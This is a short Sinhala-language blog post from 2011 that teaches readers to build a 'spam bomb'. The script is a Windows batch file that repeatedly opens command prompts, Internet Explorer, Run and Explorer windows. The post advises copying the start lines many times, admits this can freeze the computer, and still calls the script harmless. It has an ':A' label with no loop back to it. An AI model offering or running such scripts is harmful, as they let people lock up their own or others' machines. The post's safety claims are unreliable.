Tuesday, May 24, 2011

පුංචි පහේ Spam Bomb එකක් හදමු...



මේකෙ කරන්න තියෙන්නෙ හරිම ලේසි වැඩක්. එහෙනම් කරල බලමුකෝ...

මුලින් ම පහළ තියෙන එක Notepad එක‍ට copy, paste කරන්න.

@echo off
:A
start dir
start command
start iexplore.exe
start run
start explorer

ඊට පස්සෙ මේක .bat File එකක් විදියට Save කරන්න. මේක වැරදිලා හරි double click කරල run වුණොත් computer එකේ තියෙන internet explore වැනි මෙහි සදහන් වෙලා තියෙන ඒව run වෙනව.

මෙහි Start යනුවෙන් තියන ඒවා වැඩි වාර ගණනක් copy කරන එක හොදයි.
උදා:
start dir
start command
start iexplore.exe
start run
start explorer
start dir
start command
start iexplore.exe
start run
start explorer

මේක run වුණා කියල computer එකට හානියක් වෙන්නෙ නෑ. හැබැයි මේකෙ Start වලින් තියෙන ඒව හුගක් copy කරල තිබුණොත් Computer එක Stuck වෙන්න පුළුවන්. ඔයාල මේක test කරල බලන්නකෝ Start ඒව copy කරන්නෙ නැතිව....

0 comments:

Post a Comment